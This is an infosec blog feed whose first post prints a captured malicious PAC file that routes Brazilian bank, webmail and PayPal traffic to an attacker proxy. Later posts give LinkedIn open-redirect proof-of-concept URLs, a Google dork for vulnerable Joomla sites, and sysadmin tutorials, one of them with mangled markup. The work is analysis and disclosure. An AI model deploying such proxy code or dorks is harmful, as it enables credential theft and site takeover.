tag:blogger.com,1999:blog-376452062024-02-20T08:24:32.811-04:00Emanuel RodriguesNow, something about information security.Emanuel Rodrigueshttp://www.blogger.com/profile/03577341256356492716noreply@blogger.comBlogger9125tag:blogger.com,1999:blog-37645206.post-87034010748791636032012-04-07T19:02:00.000-04:002012-06-04T06:53:33.739-04:00Malicious PAC files used by Brazilian Trojans I just want to share some information about Brazilian Banker Trojans that, on the last years make use of pac files to auto proxy configuration just for some access as banks and mails.<br />
<br />
I captured this pac file on the last week, that use a little obfuscate technique: <br />
<br />
<br />
<pre>function FindProxyForURL(url, host) {
var n = new Array("duh.bradfsco",
"bradfsco",
"duh.bradfscoprimf",
"bradfscoprimf",
"duh.santandfrfmprfsaryal",
"santandfrfmprfsaryal",
"hsbc",
"duh.hsbc",
"hsbcprfmyfr",
"duh.hsbcprfmyfr",
"santandfrfmprfsaryal",
"santanderempresarial",
"banfspa",
"duh.banfspa",
"santandfr",
"duh.santandfr",
"santandfr",
"bancorfal",
"duh.bancorfal",
"syds.mg.gov.br",
"duh.syds.mg.gov.br",
"cytybank",
"duh.cytybank",
"sycredy",
"duh.sycredy",
"amerycanexpress",
"duh.amerycanexpress",
"ytau",
"duh.ytau",
"ytaupersonnalyte",
"duh.ytaupersonnalyte",
"hotmayl",
"duh.hotmayl",
"lyve",
"duh.lyve",
"pazpal",
"duh.pazpal",
"cayxa.gov.br",
"duh.cayxa.gov.br",
"duh.gmayl",
"gmayl",
"duh.hotmayl",
"hotmayl"
); </pre>
<pre> </pre>
<pre>for(var i =0;i<n.length;i++) {
str = n[i];
str = str.replace(/f/gi,"e");
str = str.replace(/z/gi,"y");
str = str.replace(/duh/gi,"www");
str = str.replace(/y/gi, "i");
if(str.indexOf("caixa") != -1)
str = str;
else if(str.indexOf("paypal") != -1)
str = str + ".com";
else if(str.indexOf("gmail") != -1)
str = str + ".com";
else if(str.indexOf("hotmail") != -1)
str = str + ".com";
else
str = str + ".com.br";
if (shExpMatch(host, str)) {
return "PROXY 218.208.33.196:80";
}
}
return "DIRECT";
}</pre>
<pre> </pre>
<pre>See that, beyond Brazilian banks, have some credential </pre>
<pre>harvester for gmail, hotmail/live and paypal.</pre>
<pre> </pre>
<pre>The url for auto-proxy configuration that I find: </pre>
<pre> </pre>
<pre>http://218.208.33.196/readme/feather.txt</pre>
<pre> </pre>
<pre>This IP have a bad reputation by open proxy, spam </pre>
<pre>and phishing activity </pre>
<pre> </pre>
<pre>Some References by @assoline:</pre>
<pre> </pre>
<pre><a href="http://www.securelist.com/en/blog/2106/Benign_Feature_Malicious_Use">Benign_Feature_Malicious_Use</a></pre>
<pre><a href="http://threatpost.com/en_us/blogs/attackers-using-malicious-pac-files-phishing-attacks-041410">attackers-using-malicious-pac-files-phishing-attacks</a></pre>
<pre> </pre>
<pre> </pre>
<pre> </pre>
<pre> </pre>
<pre> </pre>
<pre><b> </b></pre>Emanuel Rodrigueshttp://www.blogger.com/profile/03577341256356492716noreply@blogger.com0tag:blogger.com,1999:blog-37645206.post-73551940197137646812012-03-26T18:06:00.000-04:002012-03-26T18:06:07.431-04:00Linkedin Portal URL Redirection (Open Redirection) Vulnerability<br />
After some time, that is a old problem, but only now was fixed ... <br />
<br />
<br />
=======================================================<br />
Linkedin Portal URL Redirection (Open Redirection) Vulnerability<br />=======================================================<br /><br />1. OVERVIEW<br /><br />A security flaw on main linked in portal: www.linkedin.com<br /><br />2. SITE SERVICE DESCRIPTION<br /><br />LinkedIn is the world’s largest professional network with over 120 million members and growing rapidly. LinkedIn connects you to your trusted contacts and helps you exchange knowledge, ideas, and opportunities with a broader network of professionals.<br />More Information: http://learn.linkedin.com/what-is-linkedin/<br /><br />3. VULNERABILITY DESCRIPTION<br />
<br />A security flaw on main linkedin portal: www.linkedin.com trough the "redirect" file with "url" parameter. This parameter is unvalidated by application resulting in a Open redirect Flaw, where it receive any url and forward the user for it. <br /><br />4. PROOF-OF-CONCEPT/EXPLOIT<br /><br />+ Open Redirect (OWASP Top 10 2010 / A10 - Unvalidated Redirects and Forwards)<br /><br />http://www.linkedin.com/redirect?url=www.google.com.br&urlhash=OpenRedirect<br /><br />http://www.linkedin.com/redir/redirect?url=www.google.com%2F&urlhash=asasdad<br /><br />5. IMPACT<br /><br />This flaw can be used by a malicious user to send phishing to the linked in customers, abusing of the users trust on Linkedin portal, tricking the user. This user can be forward to a linkedin clone site to stolen credentials, to some malicious site hosting malware and more. <br /><br />6. VENDOR<br /><br />www.linkedin.com - http://www.linkedin.com<br /><br />7. CREDIT<br /><br />This vulnerability was discovered by:<br />Emanuel dos Reis Rodrigues<br />emanueldosreis at gmail.com<br />twitter: emanueldosreis<br /><br />8. DISCLOSURE TIME-LINE<br /><br />01-28-2012: Vulnerability discovered<br />01-29-2012: Vendor Contacted by e-mail Customer support support@linkedin.com,linkedin_support@cs.linkedin.com <br />02-04-2012: Vendor answer creating a ticket: 120129-000734 <br />02-04-2012: Vulnerability Reported<br />03-26-2012: Vulnerability Corrected<br />03-26-2012: Public Disclosure<br /><br />9. REFERENCES<br /><br />
<a href="https://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards">Top 10 2010-A10-Unvalidated Redirects and Forwards </a><br />
<br />
<br />Emanuel Rodrigueshttp://www.blogger.com/profile/03577341256356492716noreply@blogger.com0tag:blogger.com,1999:blog-37645206.post-12124360204359901462012-03-20T17:56:00.005-04:002012-03-22T11:44:06.551-04:00Joomla Privilege Escalation Flaw and some CMS hardeningOn the last week, was released this flaw <a href="http://www.blogger.com/goog_283777037">[1]</a><a href="http://jeffchannell.com/Joomla/joomla-161725-privilege-escalation-vulnerability.html%20">.</a> <br />
<br />
The problem is amplified by user auto registration on com_users, that, by default is allowed anonymous users to register themselves as Administrator leading to Joomla Administrator take over.<br />
<br />
This problem affect 1.6.x/1.7.x/2.5.0-2.5.2 versions<a href="http://www.blogger.com/goog_283777033"> </a><a href="http://jeffchannell.com/Joomla/joomla-161725-privilege-escalation-vulnerability.html%20">[2]</a>.<br />
<br />
Now, many defacers are using google to find vulnerable sites to attack.<br />
<br />
Dork: inurl:index.php?option=com_users&view=registration<br />
<br />
May be that, coming soon , we have a rise of a worm to exploit it, …. remember about JBOSS Worm ? that use CVE-2010-0738 to spread ? <br />
<br />
<br />
So, we have some mitigation options about this flaw:<br />
<br />
-> Block the user auto registration resource on com_user<br />
<br />
-> Upgrade to 2.5.3, because 1.6.x and 1.7.x have no patch yet.<br />
<br />
<br />
For all Joomla's/CMS installation, you can follow some steps more:<br />
<br />
- Remove all unnecessary plugins/components/extensions/others, keeping what really is needed.<br />
- Use the minimum of extensions as possible.<br />
- Use the lastest version of all components and core<br />
- Only allow the apache user to write where really is needed.<br />
- Keep yourself up to date about Joomla related vulnerabilities<br />
- Remove all default users and groups when it is possible.<br />
- Control the access to /Administrator, by source IP, change the Administrator path and block IP sources with a bad reputation<br />
- Use some WAF - Web Application Firewall , as ModSecurity <br />
- Use Antivirus, yes, do it at your Linux Server, it can save your life.<br />
- Use a file integrity checker as AIDE.<br />
- Use database and system accounts with minor privileges. <br />
- Make a hardening on PHP configuration<br />
- Take care about temporary folders as /tmp /var/tmp/ joomla uploads, e.g. don't allowing execution programs from here with noexec partition bit. <br />
- Implement strong password policy for joomla' s administrators<br />
- Use jail system for apache's instances.<br />
- Always use captcha when it's possible<br />
- Use Enhanced Security as SELinux or AppArmor<br />
<br />
<br />
This is not all , but can be followed for generic CMS/WebServer Hardening…<br />
<br />
<br />
<a href="http://jeffchannell.com/Joomla/joomla-161725-privilege-escalation-vulnerability.html%20">[1] http://jeffchannell.com/Joomla/joomla-161725-privilege-escalation-vulnerability.html </a><br />
<a href="http://developer.joomla.org/security/news/395-20120303-core-privilege-escalation.html">[2] http://developer.joomla.org/security/news/395-20120303-core-privilege-escalation.html</a><br />
<br />
<br />
t: @emanueldosreisEmanuel Rodrigueshttp://www.blogger.com/profile/03577341256356492716noreply@blogger.com0tag:blogger.com,1999:blog-37645206.post-35391892729907878272011-07-24T01:05:00.004-04:002011-07-24T01:06:58.670-04:00LOIC (Low Orbit Ion Cannon) DDoS/DoS Analysis [update]<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
-->
</style> <br />
<div style="margin-bottom: 0in;"><br />
</div><div style="margin-bottom: 0in;">This post is only a update note to complement the follow spiderlabs article:</div><div style="margin-bottom: 0in;"></div><div style="margin-bottom: 0in;">http://blog.spiderlabs.com/2011/01/loic-ddos-analysis-and-detection.html </div><div style="margin-bottom: 0in;"></div><div style="margin-bottom: 0in;"></div><div style="margin-bottom: 0in;">If you read, you need to now that, the LOIC HTTP GET request was fixed: </div><div style="margin-bottom: 0in;"><br />
</div><div style="margin-bottom: 0in;"></div><div style="margin-bottom: 0in;">GET / HTTP/1.0 </div><div style="margin-bottom: 0in;"><br />
</div><div style="margin-bottom: 0in;"></div><div style="margin-bottom: 0in;">But, for lucky of the anonymous target, keep the 1.0 HTTP protocol version, that can be easily controlled /mitigated by Mod-Security.</div><div style="margin-bottom: 0in;"><br />
</div><div style="margin-bottom: 0in;"><br />
</div><div style="margin-bottom: 0in;">@trustwave , @spiderlabs, @emanueldosreis , @modsecurity #infosec</div>Emanuel Rodrigueshttp://www.blogger.com/profile/03577341256356492716noreply@blogger.com0tag:blogger.com,1999:blog-37645206.post-2475918121050021032010-03-22T15:56:00.004-04:002010-03-22T16:35:44.774-04:00Instalando o Web Application Security Scanner Skipfish no BackTrack 4 FinalSkipfish é um scanner de vulnerabilidades web recém lançado pelo Google, apresentando mais uma opção para levantamento de informações de servidores Web.<br /><br />Esta dica também funciona para instalar em Ubuntu e outras Debian based ...<br /><br /><br />apt-get install libidn11-dev<br /><br />cd /tmp<br /><br />wget -c http://skipfish.googlecode.com/files/skipfish-1.10b.tgz<br /><br />tar -zxvf skipfish-1.10b.tgz<br /><br />cd skipfish<br /><br />make && cp skipfish /bin/<br /><br /><br />Para o skipfish funcionar é necessário ter uma wordlist, incialmente podemos usar uma que vem junto com os fontes do programa do<br />diretório dictionaries/ o arquivo complete.wl.<br /><br />cp dictionaries/complete.wl /root<br /><br /><br />Também é necessário um diretório onde serão gerados os relatórios a partir da opção -o, juntando tudo, um simples scanner seria feito asssim:<br /><br />skipfish -o /tmp/relatorio -W /root/complete.wl http://www.microsoft.com<br /><br /><br />Para acessar os relatorios: Abra o navegador web: /tmp/relatorio/index.html<br /><br /><br />Maiores informações, http://code.google.com/p/skipfish/wiki/SkipfishDoc<br /><br /><br />Emanuel dos Reis RodriguesEmanuel Rodrigueshttp://www.blogger.com/profile/03577341256356492716noreply@blogger.com1tag:blogger.com,1999:blog-37645206.post-70734277945509612502009-09-29T08:58:00.005-04:002009-09-29T10:06:39.017-04:00Tutorial para Configuração de ADSL OI Velox ( Resolução do problema em "Boa Vista - RR" )Depois de mais de 2 anos sem escrever nada no blog, resolvi iniciar o processo de volta ... com este tutorial .. que acredito que vai ajudar o pessoal de Boa Vista com relação ao OI Velox.<br /><br /> Ha alguns dias, chegou em Boa Vista - RR, o serviço OI Velox. Durante muito tempo, Boa Vista só recebia conexão com a internet através de satelite, o que resultava em internet com um custo muito alto( 1Mb = R$ 6.000,00 .. dependendo do humor das operadoras, tempo de contrato, etc ... ), além de uma qualidade degradada em função do delay ( média de 600 ms de Boa vista para o Mundo ). Com a OI Velox, o custo caiu e a conexão é feita com Fibra ótica através de um acordo entre a OI e a CanTV da Venezuela e ainda a EletroNorte, a fibra se liga ao brasil por meio de cabos submarinos, chegando até infraestrutura da OI no brasil.<br /> Bem, de R$ 6.000,00 caiu para R$ 300,00 e de 600 ms caiu para uma média de 160 ms, o que resultou ainda em reclamações por que a demanda foi e está muito maior que a oferta, empresas por exemplo pode se contar nos dedos quem conseguiu contratar ... Deixando isto de lado, apareceram outros problemas, o discador da OI Velox não funciona, configurar o modem adsl para fazer a discagem também não, usando o linux com pppoeconf também não, ambos abrem apenas algumas páginas e finalmente somente a conexão pppoe do próprio windows funciona corretamente. Para a OI está tudo certo, pois funciona com o rwindows ... Ligar no suporte ? não suportamos o linux ! não recebemos treinamento adequado ! não sabemos como rotear os modems ADSL ! enfim ... não ajudam em nada ... e não tem niguém na OI local da área de rede ...<br /><br />Até então, não era problema meu e eu não tive oportunidade de dar uma olhada, foi quando o problema chegou para min neste fim de semana, pois só aí tive a oportunidade de testar ... quando configurei me deparei pelas mesmas reclamações acima.<br /><br />O problema de abrir uns sites e outros não é devido ao tamanho da MTU (http://en.wikipedia.org/wiki/Maximum_transmission_unit) , alguns sites se ajustam de acordo com a capacidade de envio de dados por parte do cliente, no caso do discador rwindows, ele se auto ajusta e os outros não.<br /><br />Já era de meu conhecimento que conexões pppoe utilizam um mtu padrão de 1492, e o ppoeconf gera uma configuração compatível com este valor. No debian, o pppoeconf ainda orienta sob a possibilidade de ter que diminuir, sugerindo 1412 em algumas situações. Pois bem, foi o que testei 1492 e 1412 ... no primeiro abria poucos sites, no segundo alguns a mais ... mas não era satisfatório então deixei o achismo de lado e fiz o cálculo do MTU adequado para esta rede, o valor encontrado foi 1488.<br /><br />Primeiro instalamos e configuramos,<br /><br />apt-get install pppoe pppoeconf<br /><br />não iremos utilizar o pppoeconf como se costuma, vamos usar o arquivo de configuração abaixo, crie o arquivo /etc/ppp/peers/oi-internet<br /><br />noipdefault<br />defaultroute<br />replacedefaultroute<br />hide-password<br />#lcp-echo-interval 30<br />#lcp-echo-failure 4<br />noauth<br />mtu 1488<br />persist<br />#maxfail 0<br />#holdoff 20<br />plugin rp-pppoe.so eth0<br />user "COLOQUESEULOGIN@oi.com.br"<br />usepeerdns<br /><br /><br />Veja que COLOQUESEULOGIN@oi.com.br é um exemplo, troque pelo seu login de conexão OI velox, geralmente seu email@io.com.br ou @telemar.com.br.<br /><br />Depois inclua a senha com o comando abaixo, trocando o login e a senha pelos seus:<br /><br />echo '"COLOQUESEULOGIN@oi.com.br" * "SUASENHA"' >> /etc/ppp/pap-secrets<br /><br /><br />Configure sua interface eth0 como cliente dhcp e conecte o cabo vindo do router adsl, você irá pegar o ip vindo do router adsl.<br /><br />dhclient eth0<br /><br /><br />Se quiser pode fixar no /etc/network/interfaces para fazer na inicialização<br /><br />auto eth0<br />iface eth0 inet dhcp<br /><br /><br />Depois de pegar o ip do router, use os comandos:<br /><br />Para conectar:<br /><br />pon oi-internet<br /><br /><br />Para desconectar:<br /><br />poff oi-internet<br /><br /><br />Para automatizar tudo na inicialização, no arquivo /etc/network/interfaces:<br /><br />auto eth0<br />iface eth0 inet dhcp<br /><br />auto oi<br />iface oi inet ppp<br />pre-up /sbin/ifconfig eth0 up<br />provider oi-internet<br /><br /><br />É isso, bem simples. Quem quiser usar o pppoeconf, não tem problema, use e depois edite o arquivo /etc/ppp/peers/dsl-provider e descomente e altere o valor da mtu para 1488 e pronto, use pon dsl-provider para conectar.<br /><br />Quanto as pessoas que querem rotear no adsl, não o fiz ainda, pois estou sem modem, mas procure uma forma de trocar a MTU da conexão pppoe e incluir o valor 1488, que também irá funcionar normalmente...<br /><br />Espero ter ajudado, qualquer dúvida me passem email emanueldosreis**NOSPAM gmail.comEmanuel Rodrigueshttp://www.blogger.com/profile/03577341256356492716noreply@blogger.com4tag:blogger.com,1999:blog-37645206.post-74510927329319610542007-06-04T19:09:00.000-04:002007-06-06T17:35:33.527-04:00DNS ForwardDNS Forward<br /><br />Este é um procedimento bem simples, mas muito útil onde se tem vários servidores DNS em uma rede ou se o provedor só libera pesquisa DNS em um servidor dele ( Acredite : Isso acontece com alguns provedores, principalmente os xing .. lings ... ).<br /><br />Imaginemos o seguinte cenário: Você tem um servidor de dns central e outros em sub-redes fazendo somente cache, mas você não gostaria de liberar a pesquisa deste servidor direto aos roots servers , por questões de segurança e consumo de banda . Então colocamos eles para pesquisarem somente no central.<br /><br />Existem 2 opções no bind9 que faz esse trabalho: forwarders e forward<br /><br />dentro da seção options { } ;<br /><br />inclua:<br /><br />forwarders { 10.50.10.1 ; };<br />forward first ;<br /><br />Em forwarders você pode incluir mais de um ip, lembrando que este ip é o do servidor de dns no qual ele irá pesquisar.<br /><br />forward only, quer dizer que este servidor sempre vai pesquisar no dns especificado em forwarders, a não ser que a pesquisa esteja no próprio cache.Emanuel Rodrigueshttp://www.blogger.com/profile/03577341256356492716noreply@blogger.com1tag:blogger.com,1999:blog-37645206.post-87102130139178129302007-05-30T16:39:00.000-04:002007-06-06T20:26:45.202-04:00Trocando o certificado do apache-ssl do DebianO pacote apache-ssl do Debian é rápido e simples de instalar, basta apt-get install apache-ssl. Mas ele gera um certificado padrão com validade de 1 mês. Então vamos trocar o certificado dele e colocar para vencer daqui 10 anos ( 3650 dias ) ...<br /><br /><br /># cd /tmp<br /># openssl genrsa -out chave.key 1024<br /># chmod 600 chave.key<br /><br />No próximo passo, preencha as informações. Lembrando que em common name você deve que colocar o endereço pelo qual os usuários irão acessar o site. Ex.: https://www.exemplo.com , logo common name é www.exemplo.com<br /><br /># openssl req -new -key chave.key -out chave.csr<br /># openssl x509 -req -days 3650 -in chave.csr -signkey chave.key -out chave.crt<br /># cd /etc/apache-ssl/<br /># mv apache.pem apache.pem.antigo<br /># cat /tmp/chave.key > apache.pem<br /># cat /tmp/chave.crt >> apache.pem<br /># chmod 600 apache.pem<br /># /etc/init.d/apache-ssl restart<br /><br />: )Emanuel Rodrigueshttp://www.blogger.com/profile/03577341256356492716noreply@blogger.com1tag:blogger.com,1999:blog-37645206.post-77915855410705531842007-05-02T19:49:00.000-04:002007-07-14T15:10:31.512-04:00Tutorial de instalação Coldfusion MX 7 no Debian 4.0 ( codinome Etch)Neste artigo demonstro a instalação do Coldfusion MX 7 utilizando os pacotes do Debian Etch, isso facilita .. e muito manutenções posteriores. Com poucas alterações pode ser instalados com apache compilado e em outras distribuições.<br /><br />Não sou amante do Coldfusion, nem mesmo programo nesta liguagem e não me pronuncio diante de flames ... simplesmente tenho clientes que utilizam servidores de aplicação com esta ferramenta. :)<br /><br />Coldfusion: O Colfusion MX 7 Enterprise Server é proprietário, neste artigo irei deixá-lo funcionando em Trial, que tem as mesmas funcionalidades Enterprise, apesar de expirar em 30 dias. Você terá que ter a licensa ou adquirí-la para utilizar por mais de 30 dias.<br /><br /><br />Vamos lá:<br /><br />Download de Pacotes<br /><br />Primeiro baixe o coldfusionmx 7 no site da adobe ou copie do seu CD origial.<br /><br />www.adobe.com<br /><br />Esta instalação foi feita com a versão 702 , não deve ter problemas nas próximas versões.<br /><br />Instalação de Pacotes<br /><br />Partindo do princípio do artigo, vamos instalar o apache, lembrando que o mpm utilizado é o de sua preferência.<br /><br /># apt-get install apache2 apache2-mpm-prefork<br /><br />Pacotes Recomendados para compatibilidade:<br /><br /># apt-get install libstdc++6 libstdc++5 libstdc++2.10-glibc2.2<br /><br />Pacotes de bibliotecas gráficas.<br /><br /># apt-get install libxp6 libxtst6 libxt6<br /><br />Entre na pasta onde foi feito o download do Coldfusion MX 7<br /><br /># chmod +x coldfusion-702-lin.bin<br /><br />Depois execute o instalador.<br /><br /># ./coldfusion-701-lin.bin<br />Preparing to install...<br />Extracting the JRE from the installer archive...<br />Unpacking the JRE...<br />Extracting the installation resources from the installer archive...<br />Configuring the installer for this system's environment...<br /><br />Launching installer...<br /><br />Preparing CONSOLE Mode Installation...<br /><br />===============================================================================<br />Choose Locale...<br />----------------<br /><br />->1- English<br /><br /><br />CHOOSE LOCALE BY NUMBER: 1<br />===============================================================================<br /> (created with InstallAnywhere by Zero G)<br />-------------------------------------------------------------------------------<br /><br />===============================================================================<br />Introduction<br />------------<br /><br />Welcome to the Install Wizard for Macromedia ColdFusion MX 7<br /><br />This wizard installs Macromedia ColdFusion MX 7 on your computer or produces<br />an EAR or WAR file for deployment on your J2EE application server. Macromedia<br />recommends that you exit from all running applications before proceeding.<br /><br />Respond to each prompt to proceed to the next step in the installation. If you<br />want to change something on a previous step, type 'back'.<br /><br />You may cancel this installation at any time by typing 'quit'.<br /><br />WARNING: This program is protected by copyright laws and international<br />treaties.<br /><br />PRESS <enter> TO CONTINUE:<br /><br />===============================================================================<br />License Agreement<br />-----------------<br /><br />Leia e tecle enter até chegar a pergunta abaixo:<br /><br /><br />DO YOU ACCEPT THE TERMS OF THIS LICENSE AGREEMENT?<br />(Y/N) : Y<br /><br /><br />Responda que Y<br /><br /><br />===============================================================================<br />Pre-Installation Check<br />----------------------<br /><br />The installer has found the following errors/warnings:<br /><br />Warning: C++ compatibility pack<br /><br />The installer was unable to determine if the C++ compatibility pack is<br />installed by running the following command: rpm --query compat-libstdc++<br />If this machine uses a version of glibc that is 2.2.5.x or higher the<br />compatibility pack is necessary for C++ custom tags, Verity, and web server<br />connectors to work properly.<br /><br />For more information see the installation manual at<br />http://www.macromedia.com/go/livedocs_cfmx7docs<br /><br />PRESS <enter> TO CONTINUE WITH THE INSTALLER:<br /><br />===============================================================================<br />Install Type<br />------------<br /><br />If you do not have a serial number, select either 30-day trial or Developer<br />Edition.<br /><br />->1- Install new version of ColdFusion MX with a serial number<br />2- 30-day trial<br />3- Developer Edition<br /><br />Installation Choice: 2<br /><br />Vamos escolher a opção 2 que a versão Trial e depois você atualiza a licensa no CF administrator.<br /><br /><br />===============================================================================<br />Installer Configuration<br />-----------------------<br /><br />What kind of installation do you want?<br /><br />->1- Server configuration<br />2- Multiserver configuration<br />3- J2EE configuration (EAR file)<br />4- J2EE configuration (WAR file)<br /><br />Please select one of the following options: 1<br /><br />Vamos configurar somente o coldfusion por enquanto, opção 1.<br /><br /><br />===============================================================================<br />Is Macromedia ColdFusion MX 7 (Server Configuration) Installed?<br />---------------------------------------------------------------<br /><br />You cannot install the server configuration of Macromedia ColdFusion MX 7 if it is already installed on this computer.<br /><br />Is there already a server configuration of Macromedia ColdFusion MX 7 installed?<br /><br />1- Yes<br />->2- No<br /><br />ENTER THE NUMBER FOR YOUR CHOICE, OR PRESS <enter> TO ACCEPT THE DEFAULT:<br />: 2<br /><br />Provavelmente você não terá CF instalado, se tiver não será abordado aqui apesar de não mudar muita coisa. Opção 2.<br /><br /><br />===============================================================================<br />Sub-component installation<br />--------------------------<br /><br />The following options are available for installation.<br /><br />An option with "[X]" in front will be installed and an option with "[ ]" will<br />not. Choosing an option will toggle it on or off<br /><br />[X] 1) Getting Started Experience, Tutorials, & Documentation<br />[X] 2) ColdFusion MX 7 Search Services<br />[X] 3) Start ColdFusion on system init<br /><br />4) Continue with installation<br /><br />Select an option: 1<br /><br />Selecione a opção 1 para desmarcar a instalação das documentações, tutoriais e etc .... a não ser que queira instalar.<br /><br />===============================================================================<br />Sub-component installation<br /><br />[ ] 1) Getting Started Experience, Tutorials, & Documentation<br />[X] 2) ColdFusion MX 7 Search Services<br />[X] 3) Start ColdFusion on system init<br /><br />4) Continue with installation<br /><br />Select an option: 4<br /><br />Desmarcado a opção 1, marque agora a 4 para continuarmos com a instalação.<br /><br /><br />===============================================================================<br />Choose Install Folder<br />---------------------<br /><br />Select the directory in which to install Macromedia ColdFusion MX 7.<br /><br />Directory:<br /><br />Default Install Folder: /opt/coldfusionmx7<br /><br />ENTER AN ABSOLUTE PATH, OR PRESS <enter> TO ACCEPT THE DEFAULT<br />:<br /><br />Precione enter para o path default ou coloque onde você quer que instale, recomendo apenas Enter.<br /><br /><br />===============================================================================<br />Earlier Versions of Macromedia ColdFusion installed?<br />----------------------------------------------------<br /><br />If you installed an earlier version of ColdFusion on this computer, you can migrate your settings to Macromedia ColdFusion MX 7.<br /><br />Is there an earlier version of ColdFusion installed on this computer (for example, ColdFusion 5 or ColdFusion MX)?<br /><br />1- Yes<br />->2- No<br /><br />ENTER THE NUMBER FOR YOUR CHOICE, OR PRESS <enter> TO ACCEPT THE DEFAULT:<br />: 2<br /><br />Digite a Opção 2.<br /><br />===============================================================================<br />Configure Web Servers<br />---------------------<br /><br />Please configure your web server(s). If you do not configure a web server the<br />built-in web server will be used on port 8500 or the next available port.<br /><br />1- Add Web Server Configuration<br />->2- Continue with installation<br /><br />Choice: 2<br /><br />Digite a opção 2, depois configuramos o servidor Web.<br /><br /><br />===============================================================================<br />Runtime User<br />------------<br /><br />Enter the name of the runtime user. This user must exist already on the system.<br /><br />User Name: (DEFAULT: nobody): www-data<br /><br />Vamos usar o usuário do apache, se for utilizar outro, terá que estar cadastrado no sistema.<br /><br />===============================================================================<br />Administrator Password<br />----------------------<br /><br />Enter the password that you will use to control access to the ColdFusion MX<br />Administrator.<br /><br />This field is required.<br /><br />Password:<br />Confirm Password:<br />Confirm Password:<br /><br />Insira a senha do CF administrator.<br /><br />===============================================================================<br />RDS Password<br />------------<br /><br />The ColdFusion Remote Development Service (RDS) lets developers using<br />Macromedia tools remotely connect to this server for development purposes.<br /><br />If this is a production server, Macromedia recommends that you disable RDS.<br />Note, however, that disabling RDS also disables the directory browsing applets<br />in the ColdFusion Administrator and some of the functionality in the Report<br />Designer.<br /><br />Enable RDS (required for Report Builder and DW Extensions) (Y/N)<br />: N<br /><br />Opção N, a não ser que utilize este recurso.<br /><br /><br />===============================================================================<br />Installation Confirmation<br />-------------------------<br /><br />Installation Type:<br />Server configuration<br /><br />Licensing:<br />30-day trial<br /><br />Installation Directories:<br />Product: /opt/coldfusionmx7<br />Web root: /opt/coldfusionmx7/wwwroot<br /><br />Server Information:<br />Web Server: Built-in Web Server<br />Port: 8500<br />Search Service: installed<br />Sample Apps: not installed<br />RDS: disabled<br /><br />Disk Space Information (for Installation Target):<br />Required: 403,194,052 bytes<br />Available: 1,651,998,720 bytes<br /><br />PRESS <enter> TO CONTINUE:<br /><br /><br />===============================================================================<br />Installing...<br />-------------<br /><br />[==================|==================|==================|==================]<br />[------------------|------------------|------------------|------------------]<br /><br />===============================================================================<br />Installation Complete<br />---------------------<br /><br />You have successfully completed the first step in installing Macromedia<br />ColdFusion MX 7.<br /><br />To continue with your installation, go to /opt/coldfusionmx7/bin and type<br />"./coldfusion start" to start your server.<br /><br />Once the server is started log in to the Configuration Wizard at<br />http://[machinename]:8500/CFIDE/administrator/index.cfm<br /><br />PRESS <enter> TO EXIT THE INSTALLER:<br /><br />#<br /><br />Tente iniciar o coldfusion com o comando:<br /><br />/opt/coldfusionmx7/bin/coldfusion start<br /><br />Vai dar erro, problemas com a libc6.<br /><br /><br />Para corrigir este problema abra o script de inicialização do coldfusion:<br /><br /># vi /opt/coldfusionmx7/bin/coldfusion<br /><br />Procure por LD_ASSUME_KERNEL e comente todo o if, assim:<br /><br />....<br /># if [ ! "$SUSEFLAG" ]; then<br /># LD_ASSUME_KERNEL=2.2.9<br /># export LD_ASSUME_KERNEL<br /># fi<br />.....<br /><br />Tente iniciar o coldfusion novamente:<br /><br />/opt/coldfusionmx7/bin/coldfusion start<br /><br />Provavelmente irá iniciar normalmente.<br /><br />Para depurar você pode olhar o log do Server do Coldfusion em:<br /><br />/opt/coldfusionmx7/logs/cfserver.log<br /><br />Obs.: O Coldfusion demora um pouco para iniciar, mesmo depois de levantado, por isso tenha calma ao acessá-lo em seguida.<br /><br />Tudo certo acesse no seu navegador:<br /><br />http://ip-servidor-coldfusion:8500/CFIDE/administrator/<br /><br />Deverá pedir usuário e senha, coloque e faça suas configurações.<br /><br /><br />Agora vamos integrar o Coldfusion ao apache2.<br /><br />O apache2 do Debian Etch é a versão 2.2.<br /><br />O wsconfig é o conector do CF com o apache e é incompatível com o apache 2.2. A adobe<br />disponibilizou um hotfix para a atualização deste conector para o Apache 2.2.<br /><br />Talvez este hotfix já esteja no pacote do CF 7, mas até este caso não estava, portanto se ao tentar usar o conector e se deparar um erro relacionado a isso:<br /><br />"undefined symbol: ap_run_http_method"<br /><br />Terá que atualizar o wsconfig.<br /><br />Então, para atualizar o conector:<br /><br />Entre em /opt/coldfusionmx7/runtime/lib/<br /><br />Baixe o hotfix:<br /><br /># wget http://www.adobe.com/support/coldfusion/ts/documents/8001e97/wsconfig.zip<br /><br />Renomeie o arquivo para backup<br /><br /># mv wsconfig.jar wsconifg-apache20.jar<br /><br />Aplicando o hotfix do conector do CF para o Apache2.2<br /><br /># unzip wsconfig.zip<br /><br />Pronto, o wsconfig foi substituido pelo hotfix<br /><br />Agora sim, vamos integrar o CF ao apache2 com o seguinte comando:<br /><br /># /opt/coldfusionmx7/runtime/bin/wsconfig -server coldfusion -ws apache -dir /etc/apache2/ -bin /usr/sbin/apache2 -script /usr/sbin/apache2ctl -coldfusion<br /><br />Se receber um OK é porque está tudo bem e seu apache reiniciou sem erros.<br /><br />Veja a configuração que foi adicionada ao apache referente ao CF:<br /><br /># cat /etc/apache2/httpd.conf<br /><br /># JRun Settings<br />LoadModule jrun_module /opt/coldfusionmx7/runtime/lib/wsconfig/1/mod_jrun22.so<br /><ifmodule><br /></ifmodule></enter></enter></enter></enter></enter></enter></enter>IfModule><br /><enter><enter><enter><enter><enter><enter><enter><ifmodule>JRunConfig Verbose false<br />JRunConfig Apialloc false<br />JRunConfig Ssl false<br />JRunConfig Ignoresuffixmap false<br />JRunConfig Serverstore /opt/coldfusionmx7/runtime/lib/wsconfig/1/jrunserver.store<br />JRunConfig Bootstrap 127.0.0.1:51011<br />#JRunConfig Errorurl <optionally><br />#JRunConfig ProxyRetryInterval 600<br />#JRunConfig ConnectTimeout 15<br />#JRunConfig RecvTimeout 300<br />#JRunConfig SendTimeout 15<br />AddHandler jrun-handler .jsp .jws .cfm .cfml .cfc .cfr .cfswf<br /></optionally></ifmodule></enter></enter></enter></enter></enter></enter></enter>/IfModule><br /><enter><enter><enter><enter><enter><enter><enter><ifmodule><br />Edite este arquivo </ifmodule></enter></enter></enter></enter></enter></enter>/etc/apache2/httpd.conf e antes do "</enter>/IfModule>" coloque esta linha:<br /><br />DirectoryIndex index.cfm<br /><br />Para que 